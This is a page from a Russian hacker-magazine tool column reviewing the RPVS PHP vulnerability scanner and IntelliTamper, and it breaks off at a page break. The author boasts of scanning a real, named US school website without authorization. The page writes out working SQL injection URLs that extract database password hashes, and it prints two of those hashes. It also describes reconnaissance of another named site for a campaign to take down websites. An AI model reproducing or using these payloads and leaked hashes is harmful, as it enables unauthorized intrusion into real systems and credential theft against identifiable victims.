X-tools

Стройков Леонид aka R0id

Хакер, номер #092, стр. 092-084-1

(r0id@bk.ru)

Название: RPVS v1.3

ОС: Windows 2000/XP

Автор: overdose

Большую часть времени в ходе взлома занимает непосредственно поиск уязвимостей. Поэтому частенько возникает желание автоматизировать данный процесс. Только представь: запускаешь специальный сканер, а сам идешь пить кофе/пиво, дожидаясь появления лога. Мечты? Вовсе нет.

Я хочу представить тебе замечательную софтину под названием Remote PHP Vulnerability Scanner. Этот сканер предназначен для поиска уязвимостей в пхп-скриптах: от sql-injection до XSS.

Однажды я набрел на сайт одной из американских школ (www.fsdb.k12.fl.us). Не помню уже, чем меня заинтересовал этот ресурс, но мне захотелось протестировать на нем программу. Недолго думая, я запустил RPVS и пошел спать. Проснувшись, я увидел лог, который показывал на скул-иньекцию скрипта story.php в параметре blog_id. Запустив браузер, я набрал в адресной строке: http://www.fsdb.k12.fl.us/news/story.php?blog_id=109'§ion=State.

Через секунду передо мной предстало сообщение об ошибке запроса к MySQL-базе:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''109''' at line 1

Уязвимость действительно существовала. Я подобрал количество полей. Их оказалось 4:

http://www.fsdb.k12.fl.us/news/story.php?blog_id=-1%27+union+select+1,2,3,4/*§ion=State

А затем получил хэш рутового пароля к базе:

http://www.fsdb.k12.fl.us/news/story.php?blog_id=-1%27+union+select+1,2,password,4+from+mysql.user/*§ion=State

Сам хэш имел вид: 33F3D96C3BCB50A5B7EA60B3C46D0A990866544B.

Кроме того, в таблице mysql.user существовал еще один пользователь — newspages. Хэш его пароля я извлек и также бережно сохранил: 404d96fd7a4ea819.

Конечно, ни один сканер не сделает за тебя всю работу. Но облегчить ее вполне под силам RPVS, который доказал свою боеспособность. На диске ты найдешь не только саму программу, но и исходники к ней! Сразу хочу предупредить тебя: не вздумай менять заголовок формы на <Coded by Vasya> или иную надпись. Уважай авторов, которые подарили миру этот замечательный сканер.

Название: IntelliTamper

ОС: Windows 98/NT/2000/XP

Автор: Igor Kouzmine

Ты наверняка слышал о сетевой борьбе против террористических ресурсов. Увы, но в наши дни террористы все чаще используют сеть для планирования своих операций и проведения агитаций. После событий в г. Нальчике осенью 2005 года авторитетными людьми в андеграунде было принято решение о создании портала peace4peace.com, который бы послужил площадкой для организованных действий по устранению сайтов боевиков. Именно тогда я познакомился с софтиной IntelliTamper. Этот сканер предназначен для определения веб-директорий и их содержимого. Ведь гораздо проще начинать активные действия, имея достоверную информацию об атакуемом ресурсе. Основной целью нашей группы являлся сайт чеченских террористов kavkazcenter.com. Движок там стоял самописный, форум - vBulletin последней версии, а сам сайт находился на выделенном сервере. Нужно было каким-то образом собрать данные о жертве. И тогда я вспомнил о IntelliTamper, который, по словам одного из моих знакомых, отлично себя зарекомендовал. Я запустил сканер, вбил URL сайта КавказЦентра и стал ждать. Через некоторое время IntelliTamper показал отчет, в котором находился список веб-директорий с находящимися в них файлами. Среди прочих я обратил внимание на наличие админки новостного движка. На общее обозрение предоставляю кусок лога:

Содержание  Вперед на стр. 092-084-2
ttfb: 3.3681392669678 ms